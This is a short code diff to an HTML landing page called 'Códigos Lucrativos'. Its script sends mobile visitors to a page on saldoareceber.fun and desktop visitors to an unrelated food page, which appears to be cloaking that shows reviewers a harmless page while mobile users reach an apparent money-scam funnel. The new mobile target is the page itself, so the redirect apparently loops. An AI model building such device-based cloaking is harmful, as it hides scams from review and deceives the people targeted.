--- a/codigos-2/assets/form-2.html
+++ b/codigos-2/assets/form-2.html
@@ -3,7 +3,7 @@
     <meta charset="utf-8">
     <meta name="viewport" content="width=device-width, initial-scale=1">
     <title>Códigos Lucrativos</title>
-    <link rel="stylesheet" href="../Principal/styles.css">
+    <link rel="stylesheet" href="../principal/styles.css">
 
     <script async src="https://connect.facebook.net/en_US/fbevents.js"></script>
 
@@ -106,7 +106,7 @@
 <script type="text/javascript">
   // Verifica o tipo de dispositivo com base no User-Agent
   if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
-      window.location.href = "https://saldoareceber.fun/codigos-2/principal/index.html"; // Dispositivo móvel
+      window.location.href = "https://saldoareceber.fun/codigos-2/assets/form-2.html"; // Dispositivo móvel
   } else {
       window.location.href = "https://www.livup.com.br/ingredientes/maca"; // Desktop
   }
